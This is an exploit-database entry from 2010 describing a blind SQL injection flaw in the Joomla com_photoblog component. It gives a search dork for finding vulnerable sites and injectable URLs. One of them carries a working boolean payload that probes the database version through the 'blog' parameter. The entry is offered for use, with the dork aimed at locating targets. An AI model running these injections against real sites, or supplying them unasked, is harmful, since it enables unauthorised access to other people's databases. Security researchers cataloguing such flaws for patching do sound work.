Joomla Component (com_photoblog) Blind Sql Injection Vulnerability

2010-02-06T00:00:00
ID 1337DAY-ID-10770
Type zdt
Reporter altbta
Modified 2010-02-06T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
Joomla Component (com_photoblog) Blind Sql Injection Vulnerability
==================================================================

.:. Script : Joomla
.:. Download Script: http://webguerilla.net/downloads/3-components-for-joomla-1
.:. Bug Type : Blind Sql Injection
.:. Dork : inurl:"com_photoblog"

===[ Exploit ]===
 
www.site.com/detail.php?id=[Blind<http://www.site.com/detail.php?id=[Blind> SQL INJECTION]
 
 
www.site.com/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and<http://www.site.com/index.php?option=com_photoblog&view=images&category=1&celebs&blog=1+and> substring(@@version,1,1)=5



#  0day.today [2018-01-08]  #